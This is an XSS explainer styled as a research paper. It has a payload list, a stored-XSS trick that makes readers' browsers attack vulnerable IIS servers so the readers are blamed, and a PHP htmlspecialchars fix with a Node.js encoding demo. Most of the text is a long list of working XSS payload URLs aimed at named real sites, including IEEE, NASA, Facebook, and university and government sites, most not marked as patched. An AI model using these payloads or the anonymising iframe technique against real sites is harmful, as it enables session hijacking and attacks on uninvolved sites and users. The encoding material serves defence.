Cross site scripting (XSS) Research Paper By Aarshit Mittal and Harsha Vardhan Boppana
Cross site scripting is a web application attack, commonly found in online services and in ordinary pages of a website. The injection itself is usually transient, but a black hat or a financial fraudster can use it to obtain lasting access to a user's confidential data. XSS occurs when a web application takes data from a user and writes it back into a page without encoding it. The data is usually delivered as a hyperlink that carries the malicious content; the user will most likely click such a link from another website, an instant message, a web board post or an email. The attacker usually encodes the malicious part of the link in hex (or another encoding) so the request looks less suspicious when it is clicked.

After the web application receives the data, it builds an output page that contains the malicious data originally sent to it, in a way that makes it appear to be valid content from the website. Many popular guestbook and forum programs allow users to submit posts with HTML and JavaScript embedded in them. If, for example, I am logged in as "john" and read a message by "joe" that contains malicious JavaScript, it may be possible for "joe" to hijack my session simply because I read his bulletin board post. The payloads later on this page that call alert(document.cookie) show how such "cookie theft" reaches the session token.
According to Symantec's 2007 research on XSS, the vulnerability is found in 82% of web applications.
What is an XSS attack?
XSS is a script-injection attack against poorly secured pages, most often site search pages, that echo user input back into the response without encoding it.
Attackers often inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user and gather data from them. Everything from account hijacking, changing of user settings and cookie theft/poisoning to false advertising is possible.
New malicious uses for XSS attacks are found every day.
IEEE, NASA, Google, Facebook, Microsoft and Yahoo sites have all been found vulnerable to this attack.
There are two main kinds of XSS attack:
1. Non-persistent (reflected)
This attack is carried out by injecting client-side script into a vulnerable link. A black hat can then steal a particular user's confidential data by getting that user to click the injected link through social engineering. The script is reflected once, in the response to that one request, and is not stored anywhere on the server. (A third class, DOM-based XSS, in which the page's own client-side script writes untrusted data into the document, is not covered in this paper.)
We found this vulnerability in IEEE, NASA, Facebook, MSN and PayPal.
XSS PAYLOADS FOR ERROR PAGES AND SEARCH FIELDS (inject one of these) -->
Each payload targets a different place the input may be reflected: a leading ' or " closes a quoted JavaScript string or HTML attribute, // comments out the rest of a script line, --> and </style></script> close a comment, style or script block so that a fresh <script> can be opened, and String.fromCharCode(88,83,83) spells "XSS" without literal quotes, which survives filters that strip them.
'"--></style></script><script>alert("XSS")</script>
';alert(String.fromCharCode(88,83,83))//\'";alert(String.fromCharCode(88,83,83))//\"<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'%3Balert(String.fromCharCode(88,83,83))%3B/*
<script+language%3D'javascript'>alert(document.cookie)<%2Fscript>&type=all
<script+language%3D'javascript'>alert(document.cookie)<%2Fscript>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&page=search
">"><%2Fscript><script>alert(String.fromCharCode(88,83,83))%3B<%2Fscript>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"<'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><iframe+onload%3Dalert(%2FXSS%2F)>
-%3E%3Cscript%3Ealert%28XSS%29%3C/script%3E.html
2. Persistent (stored)
This is the most dangerous type: the injected code is saved on the server and is shown on the normal pages, so every user who views the affected page becomes a victim of the fraud and can lose crucial data without clicking anything. I found this vulnerability in Yahoo, and it has now been patched.
XSS can also be used to exploit vulnerabilities in other web sites with some degree of anonymity.
Example:
hello.asp takes one parameter (name) that is written to the page with no sanitization.
/hello.asp?name=<iframe src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe>
An iframe is used in the example because it shows something visible on the screen, but the attacker needs no response from the server, so image tags and the like are just as viable. Suppose a web board has an XSS flaw and also runs a vulnerable IIS. The attacker posts a message carrying the exploit; when another user reads the message, that user's browser makes the request, so the server logs the reader's IP address and the reader, not the attacker, is blamed and may lose the account. The target could just as well be a different IIS server from the one hosting the board.
Other exploits work the same way, for instance custom .ida overflow code:
<iframe src=http://vuln.iis.server/a.ida?XXX….XXX{CUSTOM IDA OVERFLOW CODE}></iframe>
The vulnerability is, however, easy to fix.
Let the vulnerable link be:
site.com/path/xss.php?data=<script>alert("XSS");</script>
Now we can fix it. PHP provides a function, htmlspecialchars(), that converts the characters that are special in HTML (& < > " and, with the ENT_QUOTES flag, ') into their HTML entities, so the browser displays them as text instead of parsing them as markup. Apply it where $data is written into the page (line 33 of xss.php) and check what happens:
Code: php
// ENT_QUOTES also encodes the single quote; before PHP 8.1 the default flags
// leave it untouched, which is exactly what the ';alert(...) payloads above rely on.
echo '<i>' . htmlspecialchars($data, ENT_QUOTES, 'UTF-8') . '</i>';
Opening the link above now shows the script text literally inside the page, and nothing executes.
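The payload list above and the htmlspecialchars() fix are two sides of one question: which characters are dangerous depends on where in the page the server writes the input. The following is an added example, not code from this paper or from PHP, written for Node.js. It re-implements htmlspecialchars() in JavaScript (with and without ENT_QUOTES), adds a proper JavaScript-string encoder, and feeds the polyglot payload from the list into three assumed reflection points (HTML body, a double-quoted attribute, and a single-quoted string inside an inline script). The templates for those three points are hypothetical, not the paper's xss.php. The inline-script case is actually executed with a stubbed alert(), so the result is observed rather than guessed.

```javascript
// Added example (not from the original paper). Reflected input in three output
// contexts, under the encoders a PHP search page might apply to it.

// Polyglot payload from the list above: ' and " close a JS string or attribute,
// // comments out the rest of a script line, --> closes an HTML comment and
// </SCRIPT> closes a script block.
const X = 'alert(String.fromCharCode(88,83,83))';
const POLYGLOT = `';${X}//\\';${X}//";${X}//\\";${X}//--></SCRIPT>"<'><SCRIPT>${X}</SCRIPT>`;

const identity = (s) => String(s);

// PHP htmlspecialchars() with its pre-8.1 default flags (ENT_COMPAT):
// encodes & < > and the double quote, but NOT the single quote.
function htmlSpecialChars(s) {
  return String(s).replace(/&/g, '&amp;').replace(/</g, '&lt;')
                  .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// htmlspecialchars($s, ENT_QUOTES): the single quote is encoded as well.
function htmlEscapeAll(s) {
  return htmlSpecialChars(s).replace(/'/g, '&#039;');
}

// Encoder for data placed inside a JavaScript string literal: everything that
// is not alphanumeric becomes \uXXXX, so the value can neither close the
// literal nor contain </script>.
function jsStringEscape(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Three assumed places a search page might reflect the query (hypothetical
// templates, not the paper's xss.php).
const contexts = {
  htmlBody:  (v) => `<p>No results for ${v}</p>`,
  attribute: (v) => `<input type="text" name="q" value="${v}">`,
  jsString:  (v) => `var query = '${v}'; track(query);`,
};

// Runs an inline-script fragment with alert() and track() stubbed and reports
// whether alert() was reached. The fragment is built from our own constant, so
// executing it here is safe; a SyntaxError counts as "did not run".
function scriptExecutes(fragment) {
  let fired = false;
  try {
    new Function('alert', 'track', fragment)(() => { fired = true; }, () => {});
  } catch (e) { /* SyntaxError or runtime error: no execution */ }
  return fired;
}

// true when the encoded input still escapes its context. The script context is
// executed for real; the two HTML contexts have no browser parser here, so the
// check is whether the encoded value can still open a tag (body) or close the
// double-quoted attribute.
function breaksOut(ctxName, input, encode) {
  const encoded = encode(input);
  if (ctxName === 'jsString') return scriptExecutes(contexts.jsString(encoded));
  if (ctxName === 'htmlBody') return /<[a-z/!]/i.test(encoded);
  return encoded.includes('"');
}

// One row per context, one column per encoder: 'XSS' or 'safe'.
function matrix() {
  const encoders = { none: identity, htmlspecialchars: htmlSpecialChars,
                     ENT_QUOTES: htmlEscapeAll, jsStringEscape };
  return Object.keys(contexts).map((ctx) => {
    const row = { context: ctx };
    for (const [name, enc] of Object.entries(encoders)) {
      row[name] = breaksOut(ctx, POLYGLOT, enc) ? 'XSS' : 'safe';
    }
    return row;
  });
}

console.table(matrix());
```

Running it prints a three-by-four table. htmlspecialchars() with its old default flags stops the payload in the HTML body and in the attribute, but not inside the JavaScript string, where the leading ' closes the literal and // comments out the rest of the line. ENT_QUOTES happens to stop this particular payload there, but entity encoding is still the wrong tool for script context, because it leaves backslashes and raw line terminators untouched. Data written into a script literal needs a JavaScript encoder such as jsStringEscape(), or better, should reach the script through a data attribute or a JSON document rather than by string concatenation.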
LIVE EXAMPLES OF THE VULNERABILITY:
THE INJECTED SCRIPT EXECUTED IN MOZILLA (FIREFOX) AND INTERNET EXPLORER AT THE TIME OF TESTING.
The sites listed below were found vulnerable by us; the ones marked as patched have since been fixed.
http://ieeexplore.ieee.org/search/searchresult.jsp?reload=true&newsearch=true&queryText=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"<'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
This Facebook XSS is patched now, but the error still occurred in IE at the time of writing (Facebook did not acknowledge this error; they patched it).
http://www.facebook.com/messages/?action=read&tid%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5c%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%20%3E%20%3E
http://money.cnn.com/search/index.html?sortBy=date&primaryType=mixed&source=money&query=%22%3E%3Ciframe+onload%3Dalert%28%2FXSS%2F%29%3E
http://svs.gsfc.nasa.gov/cgi-bin/advsearch.cgi?query=moon&req=search&year=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&movie_type=All&movie_size=Any&image_type=All&image_size=Any
http://ibnlive.in.com/videos/video_test_new.php?section=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.hpc.lsu.edu/systems/system.php?system=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.careersingear.com/search?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.honda.co.uk/search/?q=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E=&{}
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://pfn.sourceforge.net/index.php?opc=2%22%3E%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.porn8.com/search_result.php?search_id=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://blogs.news.com.au/technology/blog/index.php/?moo%3Cscript%3Ealert%28%27XSS%20Arrives%27%29;%3C/script%3E;%27
http://english.stanford.edu/graduate.php?type=placement&order_by=year_appointed&order=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://antares.stanford.edu/index.php/Site/Search?pagename=Site/Search&q=%22%20style=%27position:absolute;left:0;top:0;width:100%;height:100%;z-index:9999%27%20onmousemove=%27alert(21);
http://id.post.yahoo.com/search/searchForum/p/%2526amp%253Bamp%253Bquot%253B%2526amp%253Bamp%253B%252362%253B%2B%2B%2526amp%253Bamp%253B%252339%253B%2526amp%253Bamp%253B%252339%253B%253B%2521--%2526amp%253Bamp%253Bquot%253B%2B%2B%2526amp%253Bamp%253B%252339%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F%2526amp%253Bamp%253B%252392%253B%2526amp%253Bamp%253B%252339%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F%2526amp%253Bamp%253Bquot%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F%2526amp%253Bamp%253B%252392%253B%2526amp%253Bamp%253Bquot%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F--%2526amp%253Bamp%253B%252362%253B%2B%2526amp%253Bamp%253Bquot%253B%2526amp%253Bamp%253B%252362%253B%2526amp%253Bamp%253B%252339%253B%2526amp%253Bamp%253B%252362%253B%2B%2BXss%2Bby%2B%257E%2521White%2521%257E%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2526amp%253Bamp%253B%25238221%253B%2526amp%253Bamp%253B%252362%253B%2B%2B%2BGo%2BOver%2BMe/noRedirect/1 (PATCHED NOW)
http://docs.ma3hd.net/search.php?search=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.brita.net/pt/product_search.html?tx_indexedsearch%5Bsword%5D=%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&tx_indexedsearch%5B_sections%5D=0&tx_indexedsearch%5Bpointer%5D=0&tx_indexedsearch%5Bext%5D=0&tx_indexedsearch%5Blang%5D=0&tx_indexedsearch%5Bsubmit_button%5D=+&L=8&selection=product_search.html%3FL%3D8
http://tsastatus.net/search.php?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.the-west.net/?ref=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.pridefc.com/pride2005/index.php?mainpage=fighters_list&action=search&s_name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E--!%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
http://watsagri.nstl.gov.cn/SPT--QuickSearch.php?F_SearchString=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.mangoblog.org/generic.cfm?q=%3Cscript%3Ealert%28%27Namaste+by+Aarshit%27%29%3C%2Fscript%3E&event=googlesearch-search
www.callcongressnow.com/index.cfm?action=<script>alert(21)</script>
http://www.hotelplanner.com/FeaturedHotel.cfm?hid=92988&redirect=http%3A%2F%2Fwww.zplanet.in
http://mpr.go.id/search?searchtext=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://shopping.rediff.com/product/%22%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
https://www.elance.com/r/contractors/q-%26quot%3B%26gt%3B%26lt%3Bimg%20src%3Dpp%20onerror%3D%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%26gt%3B
http://www.md5center.com/md5-reverse-index.php?start=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.naaptol.com/web/profile/WO-users-W1093037O/-%3E%3Cscript%3Ealert%28XSS%29%3C/script%3E.html
http://www.internetdj.com/search.php?query=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://fesmekan.mynet.com/istanbul/mekanlar/?q=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.yuniti.com/index.php?a=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.mtv.com/sitewide/utils/gamespot/gs_scripts.jhtml?gamespotURL=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://reg.email.163.com/mailregAll/checkreg.do?username=yes&domain=163.com&sid=lCLGlQWaIQwqPYAODAaaBLsMFDjOKwOW&uid=yes%40163.com&host=webmail.mail.163.com&ver=js4&callback=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://sod-premium.com/ppv/content/detail.php?adv=ZZZ%3E%3CSCRIPT%3Ealert%28document.cookie%29;%3C/SCRIPT%3E%3E%3CSCRIPT%3Ealert%28document.cookie%29;%3C/SCRIPT%3E&mid=6321
http://www.indiamp3.com/music/index.php?term=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C%2Fscript%3E&in=song&action=search&start=0
http://myesia.com/esiaold.php?id=1&page=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29;%3C/script%3E
http://customize.org/members?name=%3C/title%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.w3.org/services/html2txt?url=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.blender3d.org/e-shop/product_info.php?products_id=97%22%3E%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.fededirectory.frb.org/search_ach.cfm?&name=asd?s=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&state=CA&city=BONN&aba=23
http://www.mp3muzika.org/search.php?search=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.electionguide.org/advanced-search.php?region=&country=&type=&round_num=0&start_month=01&start_year=2009&end_month=12&end_year=2009&submitted=1&submit.x=0&submit.y=0&submit=Search&keyword=&party_leader=&cs_keyword=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.alpeadria.org/english/index.php?page=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://onebigtorrent.org/index.php?cat=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.bugday.org/cat.php?cID=19%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.airluxe.co.uk/catalogue/products.asp?s=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://printablecolouringpages.co.uk/?s=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.super-buys.co.uk/search.php?keyword=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.disclosurescotland.co.uk/search/index.jsp?qt=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.performancecentre.co.uk/p/error.asp?ErrorMsg=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
https://www.askthe.police.uk/regions/town.mth?town=%22%3E%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3B%3C%2Fscript%3E
http://www.dk.co.uk/nf/Search/QuickSearchProc/1,,,00.html?strSearch=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://img6.imageshack.us/slideshow/webplayer.php?id=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://img1.imageshack.us/slideshow/webplayer.php?id=image.jpg%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://quickpic.us/search/?SectionIDOverride=1&SearchText=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.charities.ago.state.ma.us/charities/index.asp?charities_app_ctx=error&charities_sub_ctx=entry&error_flag=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://keygen.us/search.shtml?w=cracks&q=auth/ldap/authldap.php?includepath=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://paracoloreardibujo.s-pl.us/search.php?sbox=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.cne.gov.co/CNE/index.jsp?option=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.stc.appspot.com/compare/utah.gov/youngcart4/bbs//delete_comment.php%20.gov%20php&sa=X%3E%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E/
http://www.dcz.gov.ua/control/uk/search/meta/results?search_param=&simplesearch=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.parnamirim.rn.gov.br/busca?q=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://help.meta.ua/index.php?mode=search&q=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://md.mirkvartir.ua/cms/%27%3Balert%28String.fromCharCode%2888,83,83%29%29%3B/*
http://map.meta.ua/?map=%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://lib.meta.ua/?letter=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.novostimira.com.ua/search.php?f_words=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://search.ua/viewytv.php?url=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://search.ua/viewytv.php?type="><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://tv.meta.ua/index.php?q=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&page=search
http://prp.org.ua/index.php?mid=10&action=news_full&search_item=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.vab.ua/rus/search/?search=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://www.entel.kiev.ua/ru/searchrez.php?search=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://personas.media.mit.edu/getSnippets?name=aa%3Cscript%3Ealert%28document.cookie%29%3C/script%3Eaa&lang=
http://www.andrew.cmu.edu/cgi-bin/search?name=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3B%3C/script%3E&type=2
http://acme.able.cs.cmu.edu/pubs/show.php?type=html&ord=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://discovery.library.colostate.edu/Search/Home?lookfor=%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://mcckc.edu/searchResults.asp?cx=015941728899689753552%3Amvkfqavgtf4&ie=UTF-8&cof=FORID%3A11&q=%3E%3C%2Ftitle%3E%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3C!&sa.x=0&sa.y=0
